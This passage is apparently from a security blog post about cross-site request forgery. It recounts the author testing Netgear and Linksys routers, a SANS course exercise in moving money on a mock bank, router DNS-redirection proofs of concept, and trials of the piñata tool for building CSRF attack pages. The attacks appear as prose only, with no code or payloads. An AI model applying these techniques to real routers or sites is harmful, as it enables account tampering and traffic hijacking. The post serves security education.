Sounds interesting, right? So what can you do with CSRF? There are a slew of different options, and it depends on the vulnerable Web application. For example, I grabbed two wireless routers I had sitting in my office. One was from Netgear and the other from Linksys. A quick test showed both were vulnerable to CSRF, and I could create a Web page that would log me out of both just by opening the page in my browser while logged in. Not particularly exciting, but it gets worse.
In the SANS SEC 560 course, there is an exercise where the students demonstrate CSRF attacks against a fictitious banking site. The attack allows the students to transfer money from victims' accounts into their own. Similar to the router CSRF attack I mentioned above, there have been several proof-of-concepts where researchers have shown how consumer routers could be modified to point to malicious DNS servers in order to redirect valid traffic to the attacker's servers.
A new tool for creating proof-of-concept CSRF attacks was released recently called piñata. It is written in Python and designed to take a HTTP request for the vulnerable Web page and turn it into a HTML file containing the CSRF attack. It works for both GET and POSTs. I tested the tool with several requests against my vulnerable wireless routers by first grabbing the HTTP request via Paros proxy.
The first several test runs through errors that required me to clean up the requests. It seems the piñata was having trouble parsing the User Agent string in my requests. Once I trimmed it to one value, piñata created the appropriate CSRF attack file. I had similar problems with both GETs and POSTs, but was able to get them to work eventually.
John H. Sawyer is a senior security engineer on the IT Security Team at the University of Florida. The views and opinions expressed in this blog are his own and do not represent the views and opinions of the UF IT Security Team or the University of Florida. When John's not fighting flaming, malware-infested machines or performing autopsies on blitzed boxes, he can usually be found hanging with his family, bouncing a baby on one knee and balancing a laptop on the other. Special to Dark Reading.